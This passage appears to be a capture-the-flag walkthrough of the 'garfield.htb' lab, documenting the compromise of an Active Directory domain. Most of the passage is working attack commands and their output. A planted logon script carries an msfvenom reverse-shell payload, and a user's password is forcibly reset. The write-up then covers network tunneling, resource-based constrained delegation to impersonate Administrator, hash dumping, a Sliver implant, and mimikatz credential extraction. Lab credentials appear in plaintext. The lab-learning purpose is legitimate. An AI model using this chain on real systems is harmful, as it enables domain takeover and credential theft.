            "mtime_epoch": "2025-09-09 11:55:03",
            "size": "22 B"
        },
        "garfield.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2025-09-09 11:55:03",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2025-09-09 11:55:03",
            "size": "1.07 KB"
        },
        "garfield.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2025-08-13 07:11:08",
            "ctime_epoch": "2025-08-13 07:11:08",
            "mtime_epoch": "2025-08-13 07:11:08",
            "size": "2.73 KB"
        },
        "garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2026-02-13 20:14:50",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2026-02-13 20:14:50",
            "size": "23 B"
        },
        "garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
            "atime_epoch": "2025-09-09 12:44:34",
            "ctime_epoch": "2025-09-09 12:44:17",
            "mtime_epoch": "2025-09-09 12:44:34",
            "size": "535 B"
        },
        "garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2026-02-13 20:14:50",
            "ctime_epoch": "2025-08-13 07:04:48",
            "mtime_epoch": "2026-02-13 20:14:50",
            "size": "3.81 KB"
        },
        "garfield.htb/scripts/printerDetect.bat": {
            "atime_epoch": "2025-09-12 18:20:28",
            "ctime_epoch": "2025-09-12 18:20:17",
            "mtime_epoch": "2025-09-12 18:25:38",
            "size": "217 B"
        }
    }
}

Getting the files:

smb: \> cd garfield.htb/scripts/
smb: \garfield.htb\scripts\> get printerDetect.bat 
getting file \garfield.htb\scripts\printerDetect.bat of size 217 as printerDetect.bat (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \garfield.htb\scripts\>
. . .[SNIP]. . .

┌──(kali㉿kali)-[~]
└─$ sudo smbclient \\\\DC01.garfield.htb\\NETLOGON -U j.arbuckle --password 'Th1sD4mnC4t!@1978'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 27 17:13:47 2026
  ..                                  D        0  Tue Jan 27 17:13:47 2026
  printerDetect.bat                   A      217  Fri Sep 12 18:20:29 2025

                9250815 blocks of size 4096. 976901 blocks available
smb: \> get printerDetect.bat 
getting file \printerDetect.bat of size 217 as printerDetect.bat (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

Inside the batch file:

┌──(kali㉿kali)-[~]
└─$ cat printerDetect.bat 
@echo off
echo Detecting installed printers...
echo ==============================

wmic printer get Name,DeviceID,PortName,DriverName,Shared,Status /format:table

echo.
echo Printer detection completed.
pause                                                        
                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ cat pD.bat           
@echo off
echo Detecting installed printers...
echo ==============================

wmic printer get Name,DeviceID,PortName,DriverName,Shared,Status /format:table

echo.
echo Printer detection completed.
pause

However we discover that we actually have write access, meaning we can put another batch file and potentially trigger it or wait until local users opens it:

┌──(kali㉿kali)-[~]
└─$ sudo smbcacls //DC01/SYSVOL garfield.htb/scripts -U j.arbuckle --password 'Th1sD4mnC4t!@1978'
REVISION:1
CONTROL:SR|PD|DI|DP
OWNER:BUILTIN\Administrators
GROUP:NT AUTHORITY\SYSTEM
ACL:CREATOR OWNER:ALLOWED/OI|CI|IO/FULL
ACL:NT AUTHORITY\Authenticated Users:ALLOWED/OI|CI/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|IO/FULL
ACL:BUILTIN\Administrators:ALLOWED/0x0/RWXPO
ACL:BUILTIN\Server Operators:ALLOWED/OI|CI/READ
ACL:GARFIELD\IT Support:ALLOWED/OI|CI/RWXD
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo smbcacls //DC01/NETLOGON '/' -U j.arbuckle --password 'Th1sD4mnC4t!@1978'
REVISION:1
CONTROL:SR|PD|DI|DP
OWNER:BUILTIN\Administrators
GROUP:NT AUTHORITY\SYSTEM
ACL:CREATOR OWNER:ALLOWED/OI|CI|IO/FULL
ACL:NT AUTHORITY\Authenticated Users:ALLOWED/OI|CI/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|IO/FULL
ACL:BUILTIN\Administrators:ALLOWED/0x0/RWXPO
ACL:BUILTIN\Server Operators:ALLOWED/OI|CI/READ
ACL:GARFIELD\IT Support:ALLOWED/OI|CI/RWXD

With-out being said let’s create our .bat files with MSFVenom:

┌──(kali㉿kali)-[~]
└─$ sudo printf '@echo off\r\n%s\r\n' "$(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f psh-cmd | tail -n 1)"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of psh-cmd file: 7503 bytes

@echo off
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACg. . .[SNIP]. . .dADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo vi attack.bat

And put that file into the SMB share:

┌──(kali㉿kali)-[~]
└─$ sudo smbclient \\\\DC01.garfield.htb\\SYSVOL -U j.arbuckle --password 'Th1sD4mnC4t!@1978'                                                 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Aug 13 07:04:43 2025
  ..                                  D        0  Wed Aug 13 07:04:43 2025
  garfield.htb                       Dr        0  Wed Aug 13 07:04:43 2025

                9250815 blocks of size 4096. 976489 blocks available
smb: \> cd garfield.htb/scripts/
smb: \garfield.htb\scripts\> put attack.bat
putting file attack.bat as \garfield.htb\scripts\attack.bat (6.3 kB/s) (average 6.3 kB/s)
smb: \garfield.htb\scripts\> ls
  .                                   D        0  Mon Apr  6 09:40:30 2026
  ..                                  D        0  Mon Apr  6 09:40:30 2026
  attack.bat                          A     7514  Mon Apr  6 09:40:30 2026
  printerDetect.bat                   A      217  Fri Sep 12 18:20:29 2025

                9250815 blocks of size 4096. 976487 blocks available
smb: \garfield.htb\scripts\>

Let’s set-up our Metasploit:

┌──(kali㉿kali)-[~]
└─$ sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; exploit"    
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
LHOST => tun0
LPORT => 9001
[*] Started reverse TCP handler on 10.10.14.30:9001 
. . .[SNIP]. . .

After waiting I’ve not yet see a call-back!!

Active Directory BloodHound

Let’s BloodHound first with our first credential:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec ldap DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --bloodhound -c all --dns-server 10.129.195.37
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
LDAP        10.129.195.37   389    DC01             Resolved collection methods: dcom, psremote, session, trusts, localadmin, acl, group, objectprops, rdp, container
LDAP        10.129.195.37   389    DC01             Done in 1M 20S
LDAP        10.129.195.37   389    DC01             Compressing output into /root/.nxc/logs/DC01_10.129.195.37_2026-04-06_091927_bloodhound.zip

┌──(kali㉿kali)-[~]
└─$ cat users.txt 
Administrator
Guest
krbtgt
krbtgt_8245
j.arbuckle
l.wilson
l.wilson_adm

J.Arbuckle (Our unlucky guy):

This guy have. . .nothing!

But he was a member of IT SUPPORT:

Might say the ONLY:

However our guy have scriptPath attack-path attribute:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' get writable --detail 

distinguishedName: CN=Guest,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=garfield,DC=htb
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=krbtgt_8245,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb
thumbnailPhoto: WRITE
. . .[SNIP]. . .
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=Liz Wilson,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

To Both L.Wilson Users:

MATCH (u:User) WHERE u.name STARTS WITH 'L.WILSON' RETURN u

So with that scriptPath, it can create us an attack path, impersonate L.Wilson Users:

Tigger the (.bat) files on SMB shares

To whoever L.Wilson users we’ve got, we can eventually gain the other one due to “ForceChangePassword“ attack:

We can change the password internally with PowerShell so don’t worry bout it!!

After User L.Wilson_ADM (I believe admin) or higher L.Wilson, we discover another domain machine name of RODC01:

L.Wilson_ADM is also listed under TIER1.

TIER by SpecterOps.

So potentially we can perform delegations family (maybe RBCD) when we got L.Wilson admin, would be fast.

The computer account of RDC01 is also have OOB to krbTGT account:

There’s nothing when being RODC01 Admin groups parts, but maybe that’s for later.

What I’ve would say this is going to be:

bloodyAD
impacket

Let’s continue with the simple SMB hijack first.

Initial Access and Internal Password Reset

With all the attack-paths plan, now let’s triggers it:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --dc-ip 10.129.195.37 set object "CN=LIZ WILSON,CN=USERS,DC=GARFIELD,DC=HTB" scriptPath -v attack.bat
[+] CN=LIZ WILSON,CN=USERS,DC=GARFIELD,DC=HTB's scriptPath has been updated

And we should’ve get our shell!!:

. . .[SNIP]. . .
[*] Sending stage (232006 bytes) to 10.129.195.37
[*] Meterpreter session 1 opened (10.10.14.30:9001 -> 10.129.195.37:56804) at 2026-04-06 01:40:05 -0400

meterpreter > getuid
Server username: GARFIELD\l.wilson
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege

meterpreter >

Note:

We’re still L.Wilson
Needs to change password of L.Wilson_adm for higher access

Before password reset I did bit of enumeration and discover that it’s have another IP address which is potential another machine or nested.

Scary part of Dual Admin.

C:\Windows\system32>whoami
whoami
garfield\l.wilson

C:\Windows\system32>hostname
hostname
DC01

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c4ff:5747:1d3c:fba0%9
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter Ethernet0 3:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::3410:f33a:57f:c20a
   Link-local IPv6 Address . . . . . : fe80::31c6:5a3a:68fd:de86%7
   IPv4 Address. . . . . . . . . . . : 10.129.195.37
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe95:16b%7
                                       10.129.0.1

C:\Windows\system32>

Now let’s do the password reset first:

PS C:\ProgramData> $passwd = ConvertTo-SecureString passw0rd1 -AsPlainText -Force
$passwd = ConvertTo-SecureString passw0rd1 -AsPlainText -Force

PS C:\ProgramData> Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $passwd -Reset
Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $passwd -Reset

So now we have L.Wilson_ADM pair as logon:

user: l.wilson_adm
passwd: passw0rd1

And we can now logon as WinRM:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec ldap DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1         
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\l.wilson_adm:passw0rd1 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec winrm DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1
WINRM       10.129.195.37   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) 
WINRM       10.129.195.37   5985   DC01             [+] garfield.htb\l.wilson_adm:passw0rd1 (Pwn3d!)

*Evil-WinRM* PS C:\programdata> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== =============================================
garfield\l.wilson_adm S-1-5-21-2502726253-3859040611-225969357-3107


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
GARFIELD\Tier 1                             Group            S-1-5-21-2502726253-3859040611-225969357-3108 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

But there’s nobody in the RODC01 groups:

*Evil-WinRM* PS C:\programdata> net group "RODC administrators" /domain
Group name     RODC Administrators
Comment

Members

-------------------------------------------------------------------------------
The command completed successfully.

*Evil-WinRM* PS C:\programdata> ipconfig

Windows IP Configuration


Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::c4ff:5747:1d3c:fba0%9
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 3:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::3410:f33a:57f:c20a
   Link-local IPv6 Address . . . . . : fe80::31c6:5a3a:68fd:de86%7
   IPv4 Address. . . . . . . . . . . : 10.129.195.37
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe95:16b%7
                                       10.129.0.1
*Evil-WinRM* PS C:\programdata>

Internal Enumeration

For enumeration of the IP Address and port discover, I create this PowerShell script nammed:

PsNmap.ps1

Moreover this is the result:

*Evil-WinRM* PS C:\programdata> .\PsNmap.ps1 192.168.100.0/24
[+] 192.168.100.1
    Hostname: DC01.garfield.htb
    IPv6: fe80::31c6:5a3a:68fd:de86%7, fe80::c4ff:5747:1d3c:fba0%9, dead:beef::3410:f33a:57f:c20a
    Open Ports: 53, 88, 135, 139, 389, 445, 464, 636, 2179, 3389, 5985

[+] 192.168.100.2
    Hostname: RODC01.garfield.htb
    IPv6: N/A
    Open Ports: 53, 88, 135, 139, 389, 445, 464, 636, 3389, 5985

^C

So moreover this is my local now:

192.168.100.1  DC01 DC01.garfield.htb garfield.htb
192.168.100.2  RODC01.garfield.htb RODC01 garfield.htb

Tunneling with Ligolo-NG

So now we tunnel with Ligolo, for the binary I use NetExec for download:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec winrm DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1 -X "iwr -uri http://10.10.14.30/ela.exe -outfile C:\programdata\ela.exe"
WINRM       10.129.195.37   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) 
WINRM       10.129.195.37   5985   DC01             [+] garfield.htb\l.wilson_adm:passw0rd1 (Pwn3d!)
WINRM       10.129.195.37   5985   DC01             [+] Executed command (shell type: powershell)

Let’s set-up:

┌──(kali㉿kali)-[~]
└─$ sudo ligolo-proxy -selfcert -api-laddr 0.0.0.0:8081  
INFO[0000] Loading configuration file ligolo-ng.yaml    
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
INFO[0000] Listening on 0.0.0.0:11601                   
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://0.0.0.0:8081 
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed. 
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _                                                                                                                                                  
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/                                                                                                                                                  
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /                                                                                                                                                   
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /                                                                                                                                                    
        /____/                          /____/                                                                                                                                                     
                                                                                                                                                                                                   
  Made in France ♥            by @Nicocha30!                                                                                                                                                       
  Version: dev                                                                                                                                                                                     
                                                                                                                                                                                                   
ligolo-ng » ifcreate --name ligolo
INFO[0017] Creating a new ligolo interface...           
INFO[0017] Interface created!                           
ligolo-ng » route_add --name ligolo --route 192.168.100.0/24
INFO[0050] Route created.

Then we will run the ligolo binary.

PS: If you feel the WinRM over HTTP a-bit funny, use winrmrelayx from my GitHub for better Kerberos stuff related.

github.com/byt3n33dl3/winrmrelayx/

┌──(venv)─(root㉿kali)-[/]
└─# python3 evil_winrmrelayx.py 'l.wilson_adm':passw0rd1@DC01 -target-ip 10.129.195.37
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.195.37:5985/wsman

Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
. . .[SNIP]. . .
-a----         4/6/2026   7:46 AM        7302656 ela.exe                                                                
-a----         4/6/2026   7:35 AM           3583 PsNmap.ps1                                                             


PS C:\programdata> Start-Process -FilePath ".\ela.exe" -ArgumentList "-connect 10.10.14.30:11601 -ignore-cert" -WindowStyle Hidden

ligolo-ng » INFO[1131] Agent joined.                                 id=00155d0bdd00 name="GARFIELD\\l.wilson_adm@DC01" remote="10.129.195.37:57996"
ligolo-ng » 
ligolo-ng » session
? Specify a session : 1 - GARFIELD\l.wilson_adm@DC01 - 10.129.195.37:57996 - 00155d0bdd00
[Agent : GARFIELD\l.wilson_adm@DC01] » start
INFO[1260] Starting tunnel to GARFIELD\l.wilson_adm@DC01 (00155d0bdd00) 
[Agent : GARFIELD\l.wilson_adm@DC01] »

Done! should’ve been established by now. Supposed now we’re more comfortable with interacting with RODC01 domain machine.

RODC Abuse and RBCD Attack to RODC01

First we make our-self to RODC Administrator Group with bloodyAD:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1 add groupMember "RODC Administrators" 'l.wilson_adm'
[+] l.wilson_adm added to RODC Administrators

Internal:

PS C:\programdata> net group "RODC Administrators" /domain
Group name     RODC Administrators
Comment        

Members

-------------------------------------------------------------------------------
l.wilson_adm             
The command completed successfully.

PS C:\programdata> net group "RODC Administrators" /domain
Group name     RODC Administrators
Comment        

Members

-------------------------------------------------------------------------------
l.wilson_adm             
The command completed successfully.

L.Wilson_ADM is now on RODC Admin group.

Now we will convert Delegation control into exec, via abusing the Computer object.

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1 get object DC=garfield,DC=htb --attr ms-DS-MachineAccountQuota

distinguishedName: DC=garfield,DC=htb
ms-DS-MachineAccountQuota: 10

Let’s make DC02 computer:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 add computer DC02 passw0rd2
[+] DC02 created

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 add rbcd 'RODC01$' 'DC02$' 
[!] No security descriptor has been returned, a new one will be created
[+] DC02$ can now impersonate users on RODC01$ via S4U2Proxy

Supposed now we can request ST FKA service ticket:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" impacket-getST GARFIELD.HTB/'DC02$':passw0rd2 -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip 10.129.195.37
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache

Now we have ticket as RODC01:

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
Default principal: Administrator@GARFIELD.HTB

Valid starting       Expires              Service principal
04/06/2026 11:15:55  04/06/2026 21:15:54  cifs/RODC01.garfield.htb@GARFIELD.HTB
        renew until 04/07/2026 11:15:52

And we can logon as Admin on RODC01:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q RODC01 | cut -d ' ' -f 1,2)" netexec smb RODC01 -u Administrator --use-kcache      
SMB         RODC01          445    RODC01           [*] Windows 10 / Server 2019 Build 17763 x64 (name:RODC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         RODC01          445    RODC01           [+] GARFIELD.HTB\Administrator from ccache (Pwn3d!)

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q RODC01 | cut -d ' ' -f 1,2)" impacket-wmiexec -k -no-pass GARFIELD.HTB/Administrator@RODC01.garfield.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
garfield\administrator

C:\>hostname
RODC01

I also install an executable binary from MSFVenom and chain this second DC with our C2 and drop the NTLM hash:

meterpreter > bg
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  GARFIELD\l.wilson @ DC01  10.10.14.30:9001 -> 10.129.195.37:56804 (10.129.195.37)

msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.30:9001 
[*] Sending stage (232006 bytes) to 10.129.195.37
[*] Meterpreter session 2 opened (10.10.14.30:9001 -> 10.129.195.37:49839) at 2026-04-06 03:30:01 -0400

meterpreter > getuid
Server username: GARFIELD\Administrator
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt_8245:1603:aad3b435b51404eeaad3b435b51404ee:445aa4221e751da37a10241d962780e2:::
j.arbuckle:3101:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
l.wilson:3105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
l.wilson_adm:3107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RODC01$:1602:aad3b435b51404eeaad3b435b51404ee:0a3f810964bb5e1f0e52245f73700172:::
DC02$:10601:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

But we’re not done, due to not Gaining the main Administartor account on DC01 machine.

Plan Execution via KrbTGT RODC01

So now, we look onto the RBCD execution on RODC01 as Administrator, we have out-bound object control on the uniqes krbTGT account.

The account sign ticket for only DC:

For specific dumping, I will use mimikatz, usually now I use Sliver for that.

Sliver C2 and Mimikatz Loader

Let’s create the agent and import it with our Administrator access via wmiexec.py:

┌──(kali㉿kali)-[~]
└─$ sudo sliver-server

Sliver  Copyright (C) 2026  Bishop Fox
. . .[SNIP]. . .

Unpacking assets ...
                                                      
           ██████  ██▓     ██▓ ██▒   █▓▓█████  ██▀███ 
        ▒██    ▒ ▓██▒    ▓██▒▓██░   █▒▓█   ▀ ▓██ ▒ ██▒
        ░ ▓██▄   ▒██░    ▒██▒ ▓██  █▒░▒███   ▓██ ░▄█ ▒
          ▒   ██▒▒██░    ░██░  ▒██ █░░▒▓█  ▄ ▒██▀▀█▄  
        ▒██████▒▒░██████▒░██░   ▒▀█░  ░▒████▒░██▓ ▒██▒
        ▒ ▒▓▒ ▒ ░░ ▒░▓  ░░▓     ░ ▐░  ░░ ▒░ ░░ ▒▓ ░▒▓░
        ░ ░▒  ░ ░░ ░ ▒  ░ ▒ ░   ░ ░░   ░ ░  ░  ░▒ ░ ▒░
        ░  ░  ░    ░ ░    ▒ ░     ░░     ░     ░░   ░ 
              ░      ░  ░ ░        ░     ░  ░   ░     
                                                      
All hackers gain deathtouch
[server] sliver > [*] Server v0.0.0 - 
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > generate --mtls 10.10.14.30:9002 --os windows --arch amd64 --format exe --save agent.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m52s
[*] Implant saved to /home/kali/Documents/train/htb/garfield/agent.exe

[server] sliver > mtls --lhost 10.10.14.30 --lport 9002

[*] Starting mTLS listener ...
[server] sliver > 
[*] Successfully started job #1



[*] Session be2cb48a INTEGRAL_RISK - 10.129.195.37:49855 (RODC01) - windows/amd64 - Mon, 06 Apr 2026 03:35:20 EDT


[server] sliver > sessions

 ID         Transport   Remote Address        Hostname   Username                 Operating System   Health  
========== =========== ===================== ========== ======================== ================== =========
 be2cb48a   mtls        10.129.195.37:49855   RODC01     GARFIELD\Administrator   windows/amd64      [ALIVE] 

[server] sliver > use be2cb48a

[*] Active session INTEGRAL_RISK (be2cb48a-6107-498a-959d-087eaa9f8da1)

[server] sliver (INTEGRAL_RISK) > whoami

Logon ID: GARFIELD\Administrator
[*] Current Token ID: GARFIELD\Administrator

Mimikatz:

[server] sliver (INTEGRAL_RISK) > mimikatz "token::elevate privilege::debug sekurlsa::logonpasswords exit"

[*] Successfully executed mimikatz
[*] Got output:

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

536     {0;000003e7} 1 D 20129          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;0019b535} 0 D 1713299     GARFIELD\Administrator  S-1-5-21-2502726253-3859040611-225969357-500      (15g,26p)       Primary
 * Thread Token  : {0;000003e7} 1 D 1840878     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

